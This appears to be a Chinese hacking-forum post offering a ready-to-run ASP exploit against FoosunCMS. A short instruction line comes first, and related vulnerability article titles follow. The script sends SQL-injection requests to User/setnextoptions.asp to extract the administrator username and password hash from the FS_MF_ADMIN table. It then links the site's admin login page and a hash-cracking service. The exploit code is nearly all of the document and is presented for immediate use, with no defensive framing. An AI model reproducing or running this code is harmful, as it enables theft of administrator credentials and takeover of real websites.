把下面的代码保存成一个ASP文件然后在本地架一个ASP环境就OK了
<herd><title>foosun cms 0day exploits</title>
</herd>
<body>
<%
web=request("web")
id=request("id")
%>
关键字:会员注册step 1 of 4 step<br>
<form action='' method=post>
输入地址:<input type=text size=50 id=web name=web value="<%=web%>"><br>
要暴的ID号(默认是1)<input type=text size=3 name=id value="<%=id%>">ID为1的是超级管理员<br>
<input type=submit value="我要暴">
</form>
<form>
<%
function bin2str(bin)
dim tmp,ustr
tmp=""
for i=1 to LenB(bin)-1
ustr=AscB(MidB(bin,i,1))
if ustr>127 then
i=i+1
tmp=tmp&chr(ustr*256+AscB(MidB(bin,i,1)))
else
tmp=tmp&chr(ustr)
end if
next
bin2str=tmp
end function
webuser=web&"User/setnextoptions.asp?EquValue=1&ReqSql=select%201,ADMIN_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%20from%20FS_MF_ADMIN%20where%20id="&id
webpass=web&"User/setnextoptions.asp?EquValue=1&ReqSql=select%201,ADMIN_pass_word,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%20from%20FS_MF_ADMIN%20where%20id="&id
if web="" then
else
set x=server.createObject("Microsoft.XMLHTTP")
x.open "get",webuser,false
x.send
str=bin2str(x.responseBody)
response.write "你暴的网站地址:"&web&"<br><br>第"&id&"位的管理员<br>"
response.write "<br><a href='"&web&"/Admin/login.asp' target=""_blank"">网站后台地址</a><br>"
for i=126 to len(str)
mid1=mid1&mid(str,i,1)
next
response.write "<br>------------------<br>帐号:"&mid1&"<br>"
x.open "get",webpass,false
x.send
str=bin2str(x.responseBody)
for i=126 to len(str)
mid2=mid2&mid(str,i,1)
next
response.write "<br>密码:"&mid2&"<br>------------------<br>"
response.write "<br>爆出咯,可以YY了<br><br><a href='http://www.cmd5.com' target=""_blank"">cmd5</a>"
set x=nothing
end if
%>
具体的利用方法请参考源码。
来源:http://huairen.me/archives/68.html
只显示10条记录相关文章
风讯的产品,你还敢用吗? (浏览: 10845, 评论: 0)
再次公布风讯两个不为人知的0day (浏览: 22837, 评论: 0)
FoosunCMS Sql Injection Vulnerability (浏览: 10685, 评论: 0)
再次公布风讯两个不为人知的0day (浏览: 22837, 评论: 0)
FoosunCMS Sql Injection Vulnerability (浏览: 10685, 评论: 0)